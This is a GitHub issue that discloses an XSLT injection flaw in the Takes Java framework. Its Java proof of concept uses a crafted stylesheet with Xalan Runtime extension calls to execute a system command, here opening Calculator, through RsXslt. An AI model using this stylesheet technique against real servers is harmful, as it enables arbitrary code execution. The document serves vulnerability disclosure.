Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Takes framework has an XSLT injection vulnerability. #1293

Open
c1gar opened this issue Apr 19, 2024 · 0 comments
Open

Takes framework has an XSLT injection vulnerability. #1293

c1gar opened this issue Apr 19, 2024 · 0 comments

Comments

@c1gar
Copy link

c1gar commented Apr 19, 2024

The Takes framework is vulnerable to XSLT injection due to the lack of secure parameters in XSLT transformation function that comes with the Takes framework.
Below is an example code snippet and its effect.

package org.example;

import org.apache.commons.io.IOUtils;
import org.cactoos.Text;
import org.cactoos.io.InputStreamOf;
import org.cactoos.text.Joined;
import org.takes.rs.RsText;
import org.takes.rs.RsXslt;
import javax.xml.transform.stream.StreamSource;
import java.io.IOException;
import java.nio.charset.StandardCharsets;

public class SimpleTakesApp {
    public static void main(String[] args) throws IOException {
            final Text xml = new Joined(
                    " ",
                    "<?xml-stylesheet href='/a.xsl' type='text/xsl'?>",
                    "<page><data>ура</data></page>"
            );
            final Text xsl = new Joined(
                    " ",
                    "<xsl:stylesheet version=\"1.0\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\" xmlns:rt=\"http://xml.apache.org/xalan/java/java.lang.Runtime\" xmlns:ob=\"http://xml.apache.org/xalan/java/java.lang.Object\">\n" +
                            "   <xsl:template match=\"/\">\n" +
                            "     <xsl:variable name=\"rtobject\" select=\"rt:getRuntime()\"/>\n" +
                            "     <xsl:variable name=\"process\" select=\"rt:exec($rtobject,'open -a Calculator')\"/>\n" +
                            "     <xsl:variable name=\"processString\" select=\"ob:toString($process)\"/>\n" +
                            "     <xsl:value-of select=\"$processString\"/>\n" +
                            "   </xsl:template>\n" +
                            " </xsl:stylesheet>"
            );
            String transformedValue = IOUtils.toString(
                    new RsXslt(
                            new RsText(new InputStreamOf(xml)),
                            (href, base) -> new StreamSource(new InputStreamOf(xsl))
                    ).body(),
                    StandardCharsets.UTF_8
            );

            System.out.println(transformedValue);
        }


}

WechatIMG1423
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@c1gar